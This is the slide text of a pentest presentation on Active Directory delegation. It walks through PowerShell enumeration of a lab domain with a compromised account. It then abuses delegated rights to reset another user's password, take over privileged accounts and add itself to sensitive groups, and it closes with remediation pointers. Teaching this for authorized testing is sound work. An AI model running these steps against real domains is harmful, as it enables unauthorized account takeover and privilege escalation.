Active Directory Delegation - By @rebootuser


Published on

A brief overview of reviewing Active Directory Delegation in a pentest

Published in: Technology
  • Be the first to comment

  • Be the first to like this

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Active Directory Delegation - By @rebootuser

  1. 1. Active Directory Delegation
  2. 2. “…Active Directory delegation is critical part of many organisations' IT infrastructure. By delegating administration, you can grant users or groups only the permissions they need without adding users to privileged groups (e.g., Domain Admins, Account Operators)…”* * [source] AD Dele-What?
  3. 3. Requirements • Windows Remote Administration Toolkit • Windows attacking host with Admin Privileges • Patience and Enumeration Skills!
  4. 4. AD PowerShell Cmdlets • Import the AD PowerShell module on the attacking host • The attack box isn’t part of the victim domain, so the AD drive cannot load $Env:ADPS_LoadDefaultDrive = 0 Import-Module ActiveDirectory
  5. 5. LDAP Overview Terminology • CN = Common Name • OU = Organizational Unit • DC = Domain Component CN=bob,OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC =rebootuser,DC=local
  6. 6. Exercise We (most likely) need: • User credentials of some sort… Questions to ask: • What’s the Domain name / Distinguished Name (DN)?
  7. 7. Enumeration Get-ADDomain -Server -Credential "rebootuserbob” Redacted Output: DistinguishedName : DC=rebootuser,DC=local DNSRoot : rebootuser.local DomainMode : Windows2012Domain DomainSID : S-1-5-21-3305272636-1761470839-3168806703 Forest : rebootuser.local InfrastructureMaster : DC-01.rebootuser.local: NetBIOSName : REBOOTUSER PDCEmulator : DC-01.rebootuser.local RIDMaster : DC-01.rebootuser.local SystemsContainer : CN=System,DC=rebootuser,DC=local UsersContainer : CN=Users,DC=rebootuser,DC=local
  8. 8. Exercise We have access to bob’s account Questions to ask: • Where does bob's account reside? • Anything ‘interesting’ leaked from his account info?
  9. 9. Account Enumeration Get-ADUser -Identity "bob" -server -Credential "rebootuserbob" -properties * Redacted Output: DistinguishedName : CN=bob,OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=l ocal Description : 1st Line Support HomeDirectory : DC-01Share$HomeBob
  10. 10. Exercise Questions to ask : • How is the LDAP environment structured? • Where do user accounts reside?
  11. 11. Enumeration is Slow…. $username = "rebootuserbob" $password = ConvertTo-SecureString "P@ssw0rd!" -AsPlainText -Force $cred = new-object -typename System.Management.Automation.PSCredential - argumentlist $username, $password $diname = Get-ADOrganizationalUnit -Filter * -SearchBase "dc=rebootuser,dc=local" -Properties canonicalname -server - Credential $cred | select distinguishedname; foreach ($i in $diname) {write-output $i.distinguishedname; Get-ADUser -SearchBase $i.distinguishedname -Filter * -Searchscope onelevel -server -Credential $cred | Format-List SamAccountName}
  12. 12. Enumeration is Slow…. OU=Sales,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=local SamAccountName : sue OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=local SamAccountName : bob SamAccountName : jeff OU=Management,OU=Users,OU=London,OU=UK,OU=Offices,DC=rebootuser,DC=local SamAccountName : tim OU=Marketing,OU=Users,OU=London,OU=UK,OU=Offices,DC=rebootuser,DC=local SamAccountName : jimmy OU=IT,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local SamAccountName : godmode OU=HR,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local SamAccountName : sally
  13. 13. Exercise We’ve identified a number of custom OU’s Questions to ask : • Do any users/groups hold delegation rights over any OU’s within the environment?
  14. 14. Introducing ACL Scanner • • OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=local
  15. 15. Exercise We’ve identified 2 groups: • it_support_limited (some delegated rights) and • it_support_priv (many delegated rights) Questions to ask : • Users that have membership of either group
  16. 16. Group Memberships Get-ADGroupMember -Identity "it_support_limited" -server - Credential "rebootuserbob" | select ObjectClass, SamAccountName Get-ADGroupMember -Identity "it_support_priv" -server - Credential "rebootuserbob" | select ObjectClass, SamAccountName
  17. 17. Exercise OK, Bob (a member of “it_support_limited”) has the reset password right over the Support OU Questions to ask : • Where does Jeff’s (or any other ‘useful’) account reside?
  18. 18. Abuse of Privilege… • Looking at the previous enumeration results we see that Jeff is also in the support OU OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=local SamAccountName : bob SamAccountName : jeff • Let's change his password! Set-ADAccountPassword 'cn=jeff,ou=support,ou=users,ou=cambridge,ou=uk,ou=offices,dc=rebootuser,dc =local' -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "P@ssw0rd" -Force) -Server -Credential "rebootuserbob" To cut a long story (and many, many more slides of enumeration) IT_support_limited has password reset rights over the UK OU and child entities and IT_support_priv has all possible delegation rights over the entire Offices OU and child entities
  19. 19. Exercise Now we’ve inherited Jeff’s powerful delegation rights over the entire Offices OU and sub entities! Questions to ask : • Are there any privileged accounts we can commandeer?
  20. 20. PWN all the Admins! • From earlier recon we found an interesting user, godmode: OU=IT,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local • Which groups is godmode a member: Get-ADPrincipalGroupMembership godmode -Server -Credential "rebootuserjeff" | select name • Ah, excellent Jeff has delegation rights here, lets change the password….
  21. 21. AdminSDHolder & SDProp • AdminSDHolder is a container that exists in each AD domain • A protected group is an Active Directory group that is identified as a privileged group. This group and all its members should be protected from unintentional modifications* • When an AD group is marked a protected group; AD will ensure that the owner, the ACLs and the inheritance applied on this group are the same as the ones applied on AdminSDHolder container* * [source]
  22. 22. AdminSDHolder – Who/What/Eh? Get-ADGroup -LDAPFilter "(admincount=1)" -Server -Credential "rebootuserjeff" | Select SamAccountName Get-ADUser -LDAPFilter "(admincount=1)" -Server -Credential "rebootuserjeff" | Select SamAccountName
  23. 23. Needing Direction • So where do we go from here? • We have powerful delegation rights – we can change passwords, modify group memberships, add groups/user etc. • DA is not necessarily the end goal • Sensitive data is likely to be stored in group drives: • If we recall, Bobs home directory resides in the following location: HomeDirectory : DC-01Share$HomeBob • HR • Finance • IT • Management • …the list goes on
  24. 24. Exercise There are many directions we could take… Questions to ask : • DA is off the table (for now), but are there any other sensitive groups we can pwn?
  25. 25. Group Enumeration • Automated group enumeration – I won’t bore you with the PS query! OU=IT,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local SamAccountName : IT_support_limited SamAccountName : IT_support_priv SamAccountName : it_users SamAccountName : the_privileged_few OU=HR,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local SamAccountName : hr_users • We (Jeff) have delegation rights here - let's add ourselves (bob) to this group!
  26. 26. Delegation Disaster! DEMO
  27. 27. Final Thoughts • Complex environments could easily faultier in delegation assignments • Microsoft provide a nice wizard interface for assigning permissions… ….revoking permissions is not such a straight forward approach • Often overlooked in pentests, but a prime target! • Dsrevoke • PowerShell • ADUC > Advanced View > Security Tab